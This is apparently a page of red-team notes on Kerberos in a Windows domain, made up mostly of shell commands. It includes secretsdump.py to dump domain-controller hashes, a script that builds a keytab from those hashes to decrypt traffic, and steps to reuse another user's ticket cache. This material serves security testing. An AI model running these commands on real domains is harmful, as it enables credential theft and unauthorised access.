Kerberos

Synchronize Time

Using ntpdate:

$ sudo apt install ntpdate -y
$ sudo ntpdate $DC

Using faketime:

$ sudo apt install faketime -y
$ faketime '1970-01-01 00:00:00' /bin/date
$ faketime "`ntpdate -q $DC | awk -F. '{print $1}'`" /bin/date

Decrypt KRB5 Traffic

keytab.sh
REALM='MEGACORP.LOCAL'
secretsdump.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local -just-dc | tee secretsdump.out

# ---

cat secretsdump.out | grep aad3b435 | awk -F: '{print "    (23, '\''"$4"'\''),"}' > keys
cat secretsdump.out | grep aes256-cts-hmac-sha1-96 | awk -F: '{print "    (18, '\''"$3"'\''),"}' >> keys
curl -sSL https://github.com/dirkjanm/forest-trust-tools/raw/6bfeb990f0db8a580afe5cbba3cce1bf959a7fb8/keytab.py > keytab.py
awk 'NR <= 112' keytab.py > t
cat keys >> t
awk 'NR >= 118' keytab.py >> t
sed -i "s/TESTSEGMENT.LOCAL/${REALM}/g" t
mv t keytab.py
python3 keytab.py keytab.kt

Manual Tickets Injection

Kerberos on Linux

Check KRB5CCNAME environment variable contents:

$ env | grep KRB5

Request TGT supplying password:

$ kinit
$ klist

List available SPNs:

$ ldapsearch -Y GSSAPI -H ldap://dc1.megacorp.local -D "Administrator@MEGACORP.LOCAL" -W -b "dc=megacorp,dc=local" "servicePrincipalName=*" servicePrincipalName

Request TGS for MSSQL service:

$ kvno MSSQLSvc/SRV01.megacorp.local:1433
$ klist

Re-using keytab files to load and renew a TGT:

$ kinit administrator@MEGACORP.LOCAL -k -t /tmp/administrator.keytab
$ klist
$ kinit -R

Re-using ccache files:

$ sudo chown snovvcrash:snovvcrash /tmp/krb5cc_31337
$ kdestroy
$ export KRB5CCACHE=/tmp/krb5cc_31337
$ klist

FreeIPA

A blog series by @n0pe_sled on attacking FreeIPA:

Last updated